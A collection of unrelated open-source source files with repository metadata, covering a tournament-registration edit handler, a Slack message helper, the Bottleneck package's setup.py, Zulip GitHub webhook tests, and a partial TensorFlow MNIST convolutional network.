form.phone.data = institution.phone
reg = institution.key.parent().get()
elif (isinstance(team, RegisteredOpenTeam)):
reg = t_key.parent().get()
t = reg.key.parent().get()
#Check if they are allowed to edit
if team.authorised(user):
#If valid, update the team object
if (form.validate()):
team.leadName = form.leadName.data
team.phone = form.phone.data
team.teamName = form.teamName.data
team.sp1Name = form.sp1Name.data
team.sp2Name = form.sp2Name.data
team.sp1ESL = form.sp1ESL.data
team.sp2ESL = form.sp2ESL.data
team.sp1Novice = form.sp1Novice.data
team.sp2Novice = form.sp2Novice.data
team.put()
self.redirect('/reg_control?t=' + str(t.key.id()))
else:
template_values = {
'user' : user,
't' : t,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/team?j=' + t_key.urlsafe()),
'r' : reg,
'form' : form,
'team' : t_key.urlsafe(),
'institution' : institution
}
template = JINJA_ENVIRONMENT.get_template('view/modteam.html')
self.response.write(template.render(template_values))
else:
self.redirect(self.request.referer)
app = webapp2.WSGIApplication([
('/mod/judge', JudgeHandler),
('/mod/team', TeamHandler)
], debug=True)
|
sarrionandia/tournatrack
|
modify.py
|
Python
|
apache-2.0
| 6,380
|
from .kb import * # pragma: no flakes
EXTRA_APP_CARDS = ['kolibri']
|
ideascube/ideascube
|
ideascube/conf/kb_bdi_unicefplay.py
|
Python
|
agpl-3.0
| 71
|
"""Utility functions for sending slack messages"""
# Django
from django.conf import settings
def format_user(user):
"""Format a user for inclusion in a Slack notification"""
return "<%(url)s|%(name)s>" % {
"url": settings.MUCKROCK_URL + user.get_absolute_url(),
"name": user.profile.full_name,
}
def slack_message(icon, channel, text, attachments):
"""Formats and returns data in a Slack message format."""
return {
"icon_emoji": icon,
"channel": channel,
"text": text,
"attachments": attachments,
}
def slack_attachment(field_title, field_value, field_short=True):
"""Formats and returns data in in the Slack attachment format."""
return {"title": field_title, "value": field_value, "short": field_short}
|
MuckRock/muckrock
|
muckrock/message/utils.py
|
Python
|
agpl-3.0
| 793
|
#!/usr/bin/env python
import os
import platform
import shutil
import sys
from distutils.command.config import config as _config
from subprocess import check_output
from typing import List
from setuptools import Command, find_packages, setup
from setuptools.command.build_ext import build_ext as _build_ext
from setuptools.extension import Extension
import versioneer
class config(_config):
def run(self) -> None:
from bn_config import create_config_h
create_config_h(self)
class clean(Command):
user_options = [("all", "a", "")]
def initialize_options(self) -> None:
self.all = True
self.delete_dirs = []
self.delete_files = []
for root, dirs, files in os.walk("bottleneck"):
for d in dirs:
if d == "__pycache__":
self.delete_dirs.append(os.path.join(root, d))
if "__pycache__" in root:
continue
for f in files:
if f.endswith(".pyc") or f.endswith(".so"):
self.delete_files.append(os.path.join(root, f))
if f.endswith(".c") and "template" in f:
generated_file = os.path.join(root, f.replace("_template", ""))
if os.path.exists(generated_file):
self.delete_files.append(generated_file)
config_h = "bottleneck/include/bn_config.h"
if os.path.exists(config_h):
self.delete_files.append(config_h)
if os.path.exists("build"):
self.delete_dirs.append("build")
def finalize_options(self) -> None:
pass
def run(self) -> None:
for delete_dir in self.delete_dirs:
shutil.rmtree(delete_dir)
for delete_file in self.delete_files:
os.unlink(delete_file)
# workaround for installing bottleneck when numpy is not present
class build_ext(_build_ext):
# taken from: stackoverflow.com/questions/19919905/
# how-to-bootstrap-numpy-installation-in-setup-py#21621689
def finalize_options(self) -> None:
_build_ext.finalize_options(self)
# prevent numpy from thinking it is still in its setup process
if sys.version_info < (3,):
import __builtin__ as builtins
else:
import builtins
builtins.__NUMPY_SETUP__ = False
import numpy
# place numpy includes first, see gh #156
self.include_dirs.insert(0, numpy.get_include())
self.include_dirs.append("bottleneck/src")
self.include_dirs.append("bottleneck/include")
def build_extensions(self) -> None:
from bn_template import make_c_files
self.run_command("config")
make_c_files()
_build_ext.build_extensions(self)
cmdclass = versioneer.get_cmdclass()
cmdclass["build_ext"] = build_ext
cmdclass["clean"] = clean
cmdclass["config"] = config
def is_old_gcc() -> bool:
if sys.platform != "win32":
gcc_version = check_output(["gcc", "-dumpversion"]).decode("utf8").split(".")[0]
if int(gcc_version) < 5:
return True
return False
IS_OLD_GCC = is_old_gcc()
DEFAULT_FLAGS = ["-O2"]
if IS_OLD_GCC:
DEFAULT_FLAGS.append("-std=gnu11")
# Add the template path to sys.path so that the build can import the code
# generators without needing an already-installed bottleneck (avoids a
# circular dependency when re-compiling)
sys.path.append(os.path.join(os.path.dirname(__file__), "bottleneck/src"))
def get_cpu_arch_flags() -> List[str]:
if platform.processor() == "ppc64le":
# Needed to support SSE2 intrinsics
return ["-DNO_WARN_X86_INTRINSICS"]
else:
return []
def prepare_modules() -> List[Extension]:
base_includes = [
"bottleneck/include/bottleneck.h",
"bottleneck/include/bn_config.h",
"bottleneck/include/iterators.h",
]
arch_flags = get_cpu_arch_flags()
ext = [
Extension(
"bottleneck.reduce",
sources=["bottleneck/src/reduce.c"],
depends=base_includes,
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
ext += [
Extension(
"bottleneck.move",
sources=[
"bottleneck/src/move.c",
"bottleneck/src/move_median/move_median.c",
],
depends=base_includes + ["bottleneck/src/move_median/move_median.h"],
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
ext += [
Extension(
"bottleneck.nonreduce",
sources=["bottleneck/src/nonreduce.c"],
depends=base_includes,
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
ext += [
Extension(
"bottleneck.nonreduce_axis",
sources=["bottleneck/src/nonreduce_axis.c"],
depends=base_includes,
extra_compile_args=DEFAULT_FLAGS + arch_flags,
)
]
return ext
def get_long_description() -> str:
with open("README.rst", "r") as fid:
long_description = fid.read()
idx = max(0, long_description.find("Bottleneck is a collection"))
long_description = long_description[idx:]
return long_description
CLASSIFIERS = [
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Intended Audience :: Financial and Insurance Industry",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: C",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering",
]
metadata = dict(
name="Bottleneck",
maintainer="Christopher Whelan",
maintainer_email="bottle-neck@googlegroups.com",
description="Fast NumPy array functions written in C",
long_description=get_long_description(),
long_description_content_type="text/x-rst",
url="https://github.com/pydata/bottleneck",
download_url="http://pypi.python.org/pypi/Bottleneck",
license="Simplified BSD",
classifiers=CLASSIFIERS,
platforms="OS Independent",
version=versioneer.get_version(),
packages=find_packages(),
package_data={"bottleneck": ["LICENSE", "tests/data/**/*.c"]},
install_requires=["numpy"],
extras_require={
"doc": ["numpydoc", "sphinx", "gitpython"],
"test": ["hypothesis", "pytest"],
},
cmdclass=cmdclass,
setup_requires=["numpy"],
ext_modules=prepare_modules(),
python_requires=">=3.6",
zip_safe=False,
)
setup(**metadata)
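# --- Usage note (added for illustration) ---
# Typical invocations of the commands wired up in `cmdclass` above, assuming a
# C toolchain and numpy are available:
#   python setup.py config                 # generate bottleneck/include/bn_config.h
#   python setup.py build_ext --inplace    # templates -> C sources -> compiled extensions
#   python setup.py clean                  # drop generated C files, caches and build/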
|
kwgoodman/bottleneck
|
setup.py
|
Python
|
bsd-2-clause
| 6,752
|
import ujson
from mock import patch, MagicMock
from typing import Dict, Optional, Text
from zerver.models import Message
from zerver.lib.webhooks.git import COMMITS_LIMIT
from zerver.lib.test_classes import WebhookTestCase
class GithubWebhookTest(WebhookTestCase):
STREAM_NAME = 'github'
URL_TEMPLATE = "/api/v1/external/github?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = 'github_webhook'
EXPECTED_SUBJECT_REPO_EVENTS = u"public-repo"
EXPECTED_SUBJECT_ISSUE_EVENTS = u"public-repo / Issue #2 Spelling error in the README file"
EXPECTED_SUBJECT_PR_EVENTS = u"public-repo / PR #1 Update the README with new information"
EXPECTED_SUBJECT_DEPLOYMENT_EVENTS = u"public-repo / Deployment on production"
EXPECTED_SUBJECT_ORGANIZATION_EVENTS = u"baxterandthehackers organization"
EXPECTED_SUBJECT_BRANCH_EVENTS = u"public-repo / changes"
EXPECTED_SUBJECT_WIKI_EVENTS = u"public-repo / Wiki Pages"
def test_ping_event(self):
# type: () -> None
expected_message = u"GitHub webhook has been successfully configured by TomaszKolek"
self.send_and_test_stream_message('ping', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='ping')
def test_ping_organization_event(self):
# type: () -> None
expected_message = u"GitHub webhook has been successfully configured by eeshangarg"
self.send_and_test_stream_message('ping_organization', 'zulip-test-org', expected_message, HTTP_X_GITHUB_EVENT='ping')
def test_push_delete_branch(self):
# type: () -> None
expected_message = u"eeshangarg [deleted](https://github.com/eeshangarg/public-repo/compare/2e8cf535fb38...000000000000) the branch feature."
self.send_and_test_stream_message('push_delete_branch', u"public-repo / feature", expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_local_branch_without_commits(self):
# type: () -> None
expected_message = u"eeshangarg [pushed](https://github.com/eeshangarg/public-repo/compare/feature) the branch feature."
self.send_and_test_stream_message('push_local_branch_without_commits', u"public-repo / feature", expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_1_commit(self):
# type: () -> None
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 1 commit to branch changes.\n\n* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))"
self.send_and_test_stream_message('push_1_commit', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_1_commit_without_username(self):
# type: () -> None
expected_message = u"eeshangarg [pushed](https://github.com/eeshangarg/public-repo/compare/0383613da871...2e8cf535fb38) 1 commit to branch changes. Commits by John Snow (1).\n\n* Update the README ([2e8cf53](https://github.com/eeshangarg/public-repo/commit/2e8cf535fb38a3dab2476cdf856efda904ad4c94))"
self.send_and_test_stream_message('push_1_commit_without_username', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_1_commit_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url('master,changes')
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 1 commit to branch changes.\n\n* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))"
self.send_and_test_stream_message('push_1_commit', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters(self):
# type: () -> None
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 6 commits to branch changes. Commits by Tomasz (3), Ben (2) and baxterthehacker (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 5)
self.send_and_test_stream_message('push_multiple_committers', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters_with_others(self):
# type: () -> None
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 10 commits to branch changes. Commits by Tomasz (4), Ben (3), James (2) and others (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 9)
self.send_and_test_stream_message('push_multiple_committers_with_others', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url('master,changes')
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 6 commits to branch changes. Commits by Tomasz (3), Ben (2) and baxterthehacker (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 5)
self.send_and_test_stream_message('push_multiple_committers', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_multiple_comitters_with_others_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url('master,changes')
commits_info = u'* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n'
expected_message = u"""baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 10 commits to branch changes. Commits by Tomasz (4), Ben (3), James (2) and others (1).\n\n{}* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))""".format(commits_info * 9)
self.send_and_test_stream_message('push_multiple_committers_with_others', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_50_commits(self):
# type: () -> None
commit_info = "* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n"
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 50 commits to branch changes.\n\n{}[and 30 more commit(s)]".format(
commit_info * COMMITS_LIMIT
)
self.send_and_test_stream_message('push_50_commits', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_push_50_commits_filtered_by_branches(self):
# type: () -> None
self.url = self.build_webhook_url(branches='master,changes')
commit_info = "* Update README.md ([0d1a26e](https://github.com/baxterthehacker/public-repo/commit/0d1a26e67d8f5eaf1f6ba5c57fc3c7d91ac0fd1c))\n"
expected_message = u"baxterthehacker [pushed](https://github.com/baxterthehacker/public-repo/compare/9049f1265b7d...0d1a26e67d8f) 50 commits to branch changes.\n\n{}[and 30 more commit(s)]".format(
commit_info * COMMITS_LIMIT
)
self.send_and_test_stream_message('push_50_commits', self.EXPECTED_SUBJECT_BRANCH_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_commit_comment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker [commented](https://github.com/baxterthehacker/public-repo/commit/9049f1265b7d61be4a8904a9a27120d2064dab3b#commitcomment-11056394) on [9049f12](https://github.com/baxterthehacker/public-repo/commit/9049f1265b7d61be4a8904a9a27120d2064dab3b)\n~~~ quote\nThis is a really good change! :+1:\n~~~"
self.send_and_test_stream_message('commit_comment', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='commit_comment')
def test_create_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created tag 0.0.1"
self.send_and_test_stream_message('create', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='create')
def test_delete_msg(self):
# type: () -> None
expected_message = u"baxterthehacker deleted tag simple-tag"
self.send_and_test_stream_message('delete', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='delete')
def test_deployment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created new deployment"
self.send_and_test_stream_message('deployment', self.EXPECTED_SUBJECT_DEPLOYMENT_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='deployment')
def test_deployment_status_msg(self):
# type: () -> None
expected_message = u"Deployment changed status to success"
self.send_and_test_stream_message('deployment_status', self.EXPECTED_SUBJECT_DEPLOYMENT_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='deployment_status')
def test_fork_msg(self):
# type: () -> None
expected_message = u"baxterandthehackers forked [public-repo](https://github.com/baxterandthehackers/public-repo)"
self.send_and_test_stream_message('fork', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='fork')
def test_issue_comment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker [commented](https://github.com/baxterthehacker/public-repo/issues/2#issuecomment-99262140) on [Issue #2](https://github.com/baxterthehacker/public-repo/issues/2)\n\n~~~ quote\nYou are totally right! I'll get this fixed right away.\n~~~"
self.send_and_test_stream_message('issue_comment', self.EXPECTED_SUBJECT_ISSUE_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='issue_comment')
def test_issue_msg(self):
# type: () -> None
expected_message = u"baxterthehacker opened [Issue #2](https://github.com/baxterthehacker/public-repo/issues/2)\n\n~~~ quote\nIt looks like you accidently spelled 'commit' with two 't's.\n~~~"
self.send_and_test_stream_message('issue', self.EXPECTED_SUBJECT_ISSUE_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='issues')
def test_membership_msg(self):
# type: () -> None
expected_message = u"baxterthehacker added [kdaigle](https://github.com/kdaigle) to Contractors team"
self.send_and_test_stream_message('membership', self.EXPECTED_SUBJECT_ORGANIZATION_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='membership')
def test_member_msg(self):
# type: () -> None
expected_message = u"baxterthehacker added [octocat](https://github.com/octocat) to [public-repo](https://github.com/baxterthehacker/public-repo)"
self.send_and_test_stream_message('member', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='member')
def test_pull_request_opened_msg(self):
# type: () -> None
expected_message = u"baxterthehacker opened [PR](https://github.com/baxterthehacker/public-repo/pull/1)\nfrom `changes` to `master`\n\n~~~ quote\nThis is a pretty simple change that we need to pull into master.\n~~~"
self.send_and_test_stream_message('opened_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_synchronized_msg(self):
# type: () -> None
expected_message = u"baxterthehacker updated [PR](https://github.com/baxterthehacker/public-repo/pull/1)\nfrom `changes` to `master`"
self.send_and_test_stream_message('synchronized_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_closed_msg(self):
# type: () -> None
expected_message = u"baxterthehacker closed without merge [PR](https://github.com/baxterthehacker/public-repo/pull/1)"
self.send_and_test_stream_message('closed_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_merged_msg(self):
# type: () -> None
expected_message = u"baxterthehacker merged [PR](https://github.com/baxterthehacker/public-repo/pull/1)"
self.send_and_test_stream_message('merged_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_public_msg(self):
# type: () -> None
expected_message = u"baxterthehacker made [the repository](https://github.com/baxterthehacker/public-repo) public"
self.send_and_test_stream_message('public', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='public')
def test_wiki_pages_msg(self):
# type: () -> None
expected_message = u"jasonrudolph:\n* created [Home](https://github.com/baxterthehacker/public-repo/wiki/Home)\n* created [Home](https://github.com/baxterthehacker/public-repo/wiki/Home)"
self.send_and_test_stream_message('wiki_pages', self.EXPECTED_SUBJECT_WIKI_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='gollum')
def test_watch_msg(self):
# type: () -> None
expected_message = u"baxterthehacker starred [the repository](https://github.com/baxterthehacker/public-repo)"
self.send_and_test_stream_message('watch_repository', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='watch')
def test_repository_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created [the repository](https://github.com/baxterandthehackers/public-repo)"
self.send_and_test_stream_message('repository', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='repository')
def test_team_add_msg(self):
# type: () -> None
expected_message = u"[The repository](https://github.com/baxterandthehackers/public-repo) was added to team github"
self.send_and_test_stream_message('team_add', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='team_add')
def test_release_msg(self):
# type: () -> None
expected_message = u"baxterthehacker published [the release](https://github.com/baxterthehacker/public-repo/releases/tag/0.0.1)"
self.send_and_test_stream_message('release', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='release')
def test_page_build_msg(self):
# type: () -> None
expected_message = u"Github Pages build, trigerred by baxterthehacker, is built"
self.send_and_test_stream_message('page_build', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='page_build')
def test_status_msg(self):
# type: () -> None
expected_message = u"[9049f12](https://github.com/baxterthehacker/public-repo/commit/9049f1265b7d61be4a8904a9a27120d2064dab3b) changed its status to success"
self.send_and_test_stream_message('status', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='status')
def test_pull_request_review_msg(self):
# type: () -> None
expected_message = u"baxterthehacker submitted [PR Review](https://github.com/baxterthehacker/public-repo/pull/1#pullrequestreview-2626884)"
self.send_and_test_stream_message('pull_request_review', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request_review')
def test_pull_request_review_comment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created [PR Review Comment](https://github.com/baxterthehacker/public-repo/pull/1#discussion_r29724692)\n\n~~~ quote\nMaybe you should use more emojji on this line.\n~~~"
self.send_and_test_stream_message('pull_request_review_comment', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request_review_comment')
def test_push_tag_msg(self):
# type: () -> None
expected_message = u"baxterthehacker pushed tag abc"
self.send_and_test_stream_message('push_tag', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_pull_request_edited_msg(self):
# type: () -> None
expected_message = u"baxterthehacker edited [PR](https://github.com/baxterthehacker/public-repo/pull/1)\nfrom `changes` to `master`"
self.send_and_test_stream_message('edited_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message,
HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_assigned_msg(self):
# type: () -> None
expected_message = u"baxterthehacker assigned [PR](https://github.com/baxterthehacker/public-repo/pull/1) to baxterthehacker"
self.send_and_test_stream_message('assigned_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message,
HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_unassigned_msg(self):
# type: () -> None
expected_message = u"eeshangarg unassigned [PR](https://github.com/zulip-test-org/helloworld/pull/1)"
self.send_and_test_stream_message(
'unassigned_pull_request',
'helloworld / PR #1 Mention that Zulip rocks!',
expected_message,
HTTP_X_GITHUB_EVENT='pull_request'
)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_labeled_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('labeled_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_unlabeled_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('unlabeled_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_request_review_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('request_review_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_request_review_remove_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('request_review_removed_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_1_commit_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_1_commit')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_50_commits_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_50_commits')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_multiple_comitters_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_multiple_committers')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_multiple_comitters_with_others_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_multiple_committers_with_others')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
|
verma-varsha/zulip
|
zerver/webhooks/github_webhook/tests.py
|
Python
|
apache-2.0
| 22,570
|
""" Using convolutional net on MNIST dataset of handwritten digit
(http://yann.lecun.com/exdb/mnist/)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
N_CLASSES = 10
# Step 1: Read in data
# using TF Learn's built in function to load MNIST data to the folder data/mnist
mnist = input_data.read_data_sets("/data/mnist", one_hot=True)
# Step 2: Define parameters for the model
LEARNING_RATE = 0.001
BATCH_SIZE = 128
SKIP_STEP = 10
DROPOUT = 0.75
N_EPOCHS = 1
# Step 3: create placeholders for features and labels
# each image in the MNIST data is of shape 28*28 = 784
# therefore, each image is represented with a 1x784 tensor
# We'll be applying dropout to the hidden layer, so we'll need a placeholder
# for the dropout probability too
# Use None for shape so we can change the batch_size once we've built the graph
with tf.name_scope('data'):
X = tf.placeholder(tf.float32, [None, 784], name="X_placeholder")
Y = tf.placeholder(tf.float32, [None, 10], name="Y_placeholder")
dropout = tf.placeholder(tf.float32, name='dropout')
# Step 4 + 5: create weights + do inference
# the model is conv -> relu -> pool -> conv -> relu -> pool -> fully connected -> softmax
global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')
with tf.variable_scope('conv1') as scope:
# first, reshape the image to [BATCH_SIZE, 28, 28, 1] to make it work with tf.nn.conv2d
images = tf.reshape(X, shape=[-1, 28, 28, 1])
kernel = tf.get_variable('kernel', [5, 5, 1, 32],
initializer=tf.truncated_normal_initializer())
biases = tf.get_variable('biases', [32],
initializer=tf.random_normal_initializer())
conv = tf.nn.conv2d(images, kernel, strides=[1, 1, 1, 1], padding='SAME')
conv1 = tf.nn.relu(conv + biases, name=scope.name)
# output is of dimension BATCH_SIZE x 28 x 28 x 32
with tf.variable_scope('pool1') as scope:
pool1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME')
# output is of dimension BATCH_SIZE x 14 x 14 x 32
with tf.variable_scope('conv2') as scope:
# similar to conv1, except kernel now is of the size 5 x 5 x 32 x 64
kernel = tf.get_variable('kernels', [5, 5, 32, 64],
initializer=tf.truncated_normal_initializer())
biases = tf.get_variable('biases', [64],
initializer=tf.random_normal_initializer())
conv = tf.nn.conv2d(pool1, kernel, strides=[1, 1, 1, 1], padding='SAME')
conv2 = tf.nn.relu(conv + biases, name=scope.name)
# output is of dimension BATCH_SIZE x 14 x 14 x 64
with tf.variable_scope('pool2') as scope:
# similar to pool1
pool2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME')
# output is of dimension BATCH_SIZE x 7 x 7 x 64
with tf.variable_scope('fc') as scope:
# use weight of dimension 7 * 7 * 64 x 1024
input_features = 7 * 7 * 64
w = tf.get_variable('weights', [input_features, 1024],
initializer=tf.truncated_normal_initializer())
b = tf.get_variable('biases', [1024],
initializer=tf.random_normal_initializer())
# reshape pool2 to 2 dimensional
pool2 = tf.reshape(pool2, [-1, input_features])
fc = tf.nn.relu(tf.matmul(pool2, w) + b, name='relu')
